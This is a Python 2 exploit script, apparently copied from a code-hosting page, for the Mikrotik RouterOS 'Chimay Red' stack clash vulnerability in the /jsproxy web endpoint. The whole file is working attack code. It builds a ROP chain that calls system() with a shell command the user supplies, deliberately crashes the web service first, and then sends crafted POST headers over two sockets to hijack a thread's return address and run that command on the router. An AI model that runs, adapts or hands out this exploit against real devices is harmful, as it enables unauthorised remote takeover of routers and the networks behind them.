251 lines
No EOL
7.6 KiB
Python
Executable file
251 lines
No EOL
7.6 KiB
Python
Executable file
#!/usr/bin/env python2
|
|
|
|
# Mikrotik Chimay Red Stack Clash Exploit by wsxarcher (based on BigNerd95 POC)
|
|
|
|
# tested on RouterOS 6.38.4 (x86)
|
|
|
|
# ASLR enabled on libs only
|
|
# DEP enabled
|
|
|
|
import socket, time, sys, struct
|
|
from pwn import *
|
|
import ropgadget
|
|
|
|
AST_STACKSIZE = 0x800000 # default stack size per thread (8 MB)
|
|
ROS_STACKSIZE = 0x20000 # newer version of ROS have a different stack size per thread (128 KB)
|
|
SKIP_SPACE = 0x1000 # 4 KB of "safe" space for the stack of thread 2
|
|
ROP_SPACE = 0x8000 # we can send 32 KB of ROP chain!
|
|
|
|
ALIGN_SIZE = 0x10 # alloca align memory with "content-length + 0x10 & 0xF" so we need to take it into account
|
|
ADDRESS_SIZE = 0x4 # we need to overwrite a return address to start the ROP chain
|
|
|
|
context(arch="i386", os="linux", log_level="WARNING")
|
|
|
|
gadgets = dict()
|
|
plt = dict()
|
|
strings = dict()
|
|
system_chunks = []
|
|
cmd_chunks = []
|
|
|
|
def makeHeader(num):
|
|
return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") + bytes(str(num)) + bytes("\r\n\r\n")
|
|
|
|
def makeSocket(ip, port):
|
|
s = socket.socket()
|
|
try:
|
|
s.connect((ip, port))
|
|
except:
|
|
print("Error connecting to socket")
|
|
sys.exit(-1)
|
|
print("Connected")
|
|
time.sleep(0.5)
|
|
return s
|
|
|
|
def socketSend(s, data):
|
|
try:
|
|
s.send(data)
|
|
except:
|
|
print("Error sending data")
|
|
sys.exit(-1)
|
|
print("Sent")
|
|
time.sleep(0.5)
|
|
|
|
def ropCall(function_address, *arguments):
|
|
|
|
payload = struct.pack('<L', function_address)
|
|
|
|
num_arg = len(arguments)
|
|
|
|
if num_arg > 0:
|
|
|
|
if num_arg == 1:
|
|
ret_gadget = gadgets['p']
|
|
elif num_arg == 2:
|
|
ret_gadget = gadgets['pp']
|
|
elif num_arg == 3:
|
|
ret_gadget = gadgets['ppp']
|
|
elif num_arg == 4:
|
|
ret_gadget = gadgets['pppp']
|
|
else:
|
|
raise
|
|
|
|
payload += struct.pack('<L', ret_gadget)
|
|
|
|
for arg in arguments:
|
|
payload += struct.pack('<L', arg)
|
|
|
|
return payload
|
|
|
|
# pwntools filters out JOP gadgets
|
|
# https://github.com/Gallopsled/pwntools/blob/5d537a6189be5131e63144e20556302606c5895e/pwnlib/rop/rop.py#L1074
|
|
def ropSearchJmp(elf, instruction):
|
|
oldargv = sys.argv
|
|
sys.argv = ['ropgadget', '--binary', elf.path, '--only', 'jmp']
|
|
args = ropgadget.args.Args().getArgs()
|
|
core = ropgadget.core.Core(args)
|
|
core.do_binary(elf.path)
|
|
core.do_load(0)
|
|
|
|
sys.argv = oldargv
|
|
|
|
for gadget in core._Core__gadgets:
|
|
address = gadget['vaddr'] - elf.load_addr + elf.address
|
|
if gadget['gadget'] == instruction:
|
|
return address
|
|
|
|
raise
|
|
|
|
def loadOffsets(binary, shellCmd):
|
|
elf = ELF(binary)
|
|
rop = ROP(elf)
|
|
|
|
if len([_ for _ in elf.search("pthread_attr_setstacksize")]) > 0:
|
|
global AST_STACKSIZE
|
|
AST_STACKSIZE = ROS_STACKSIZE
|
|
|
|
# www PLT symbols
|
|
plt["strncpy"] = elf.plt['strncpy']
|
|
plt["dlsym"] = elf.plt['dlsym']
|
|
|
|
# Gadgets to clean the stack from arguments
|
|
gadgets['pppp'] = rop.search(regs=["ebx", "esi", "edi", "ebp"]).address
|
|
gadgets['ppp'] = rop.search(regs=["ebx", "ebp"], move=(4*4)).address
|
|
gadgets['pp'] = rop.search(regs=["ebx", "ebp"]).address
|
|
gadgets['p'] = rop.search(regs=["ebp"]).address
|
|
|
|
# Gadget to jump on the result of dlsym (address of system)
|
|
gadgets['jeax'] = ropSearchJmp(elf, "jmp eax")
|
|
|
|
system_chunks.extend(searchStringChunksLazy(elf, "system\x00"))
|
|
cmd_chunks.extend(searchStringChunksLazy(elf, shellCmd + "\x00"))
|
|
|
|
# get the address of the first writable segment to store strings
|
|
writable_address = elf.writable_segments[0].header.p_paddr
|
|
|
|
strings['system'] = writable_address
|
|
strings['cmd'] = writable_address + 0xf
|
|
|
|
def generateStrncpyChain(dst, chunks):
|
|
chain = ""
|
|
offset = 0
|
|
for (address, length) in chunks:
|
|
chain += ropCall(plt["strncpy"], dst + offset, address, length)
|
|
offset += length
|
|
|
|
return chain
|
|
|
|
# only search for single chars
|
|
def searchStringChunksLazy(elf, string):
|
|
chunks = []
|
|
for b in string:
|
|
res = [_ for _ in elf.search(b)]
|
|
if len(res) > 0:
|
|
chunks.append((res[0], 1))
|
|
else:
|
|
raise
|
|
|
|
if len(string) != len(chunks):
|
|
raise
|
|
|
|
return chunks
|
|
|
|
# [bugged, some problem with dots, not used]
|
|
# search chunks of string
|
|
def searchStringChunks(elf, string):
|
|
chunks = []
|
|
total = len(string)
|
|
|
|
if string == "":
|
|
raise
|
|
|
|
looking = string
|
|
|
|
while string != "":
|
|
results = [_ for _ in elf.search(looking)]
|
|
|
|
if len(results) > 0:
|
|
chunks.append((results[0], len(looking)))
|
|
string = string[len(looking):]
|
|
looking = string
|
|
else: # search failed
|
|
looking = looking[:-1] # search again removing last char
|
|
|
|
check_length = 0
|
|
for (address, length) in chunks:
|
|
check_length = check_length + length
|
|
|
|
if check_length == total:
|
|
return chunks
|
|
else:
|
|
raise
|
|
|
|
def buildROP(binary, shellCmd):
|
|
loadOffsets(binary, shellCmd)
|
|
|
|
# ROP chain
|
|
exploit = generateStrncpyChain(strings['system'], system_chunks) # w_segment = "system"
|
|
exploit += generateStrncpyChain(strings['cmd'], cmd_chunks) # w_segment = "bash cmd"
|
|
exploit += ropCall(plt["dlsym"], 0, strings['system']) # dlsym(0, "system"), eax = libc.system
|
|
exploit += ropCall(gadgets['jeax'], strings['cmd']) # system("cmd")
|
|
|
|
# The server is automatically restarted after 3 secs, so we make it crash with a random address
|
|
exploit += struct.pack('<L', 0x13371337)
|
|
|
|
return exploit
|
|
|
|
def stackClash(ip, port, ropChain):
|
|
|
|
print("Opening 2 sockets")
|
|
|
|
# 1) Start 2 threads
|
|
# open 2 socket so 2 threads are created
|
|
s1 = makeSocket(ip, port) # socket 1, thread A
|
|
s2 = makeSocket(ip, port) # socket 2, thread B
|
|
|
|
print("Stack clash...")
|
|
|
|
# 2) Stack Clash
|
|
# 2.1) send post header with Content-Length bigger than AST_STACKSIZE to socket 1 (thread A)
|
|
socketSend(s1, makeHeader(AST_STACKSIZE + SKIP_SPACE + ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here)
|
|
|
|
# 2.2) send some bytes as post data to socket 1 (thread A)
|
|
socketSend(s1, b'A'*(SKIP_SPACE - ALIGN_SIZE - ADDRESS_SIZE)) # increase the post_data buffer pointer of thread A to a position where a return address of thread B will be saved
|
|
|
|
# 2.3) send post header with Content-Length to reserve ROP space to socket 2 (thread B)
|
|
socketSend(s2, makeHeader(ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread B will point where post_data buffer pointer of thread A is positioned
|
|
|
|
print("Sending payload")
|
|
|
|
# 3) Send ROP chain
|
|
socketSend(s1, ropChain) # thread A writes the ROP chain in the stack of thread B
|
|
|
|
print("Starting exploit")
|
|
|
|
# 4) Start ROP chain
|
|
s2.close() # close socket 2 to return from the function of thread B and start ROP chain
|
|
|
|
print("Done!")
|
|
|
|
def crash(ip, port):
|
|
print("Crash...")
|
|
s = makeSocket(ip, port)
|
|
socketSend(s, makeHeader(-1))
|
|
socketSend(s, b'A' * 0x1000)
|
|
s.close()
|
|
time.sleep(2.5) # www takes up to 3 seconds to restart
|
|
|
|
if __name__ == "__main__":
|
|
if len(sys.argv) == 5:
|
|
ip = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
binary = sys.argv[3]
|
|
shellCmd = sys.argv[4]
|
|
|
|
print("Building ROP chain...")
|
|
ropChain = buildROP(binary, shellCmd)
|
|
print("The ROP chain is " + str(len(ropChain)) + " bytes long (" + str(ROP_SPACE) + " bytes available)")
|
|
|
|
crash(ip, port) # should make stack clash more reliable
|
|
stackClash(ip, port, ropChain)
|
|
else:
|
|
print("Usage: ./StackClashROPsystem.py IP PORT binary shellcommand") |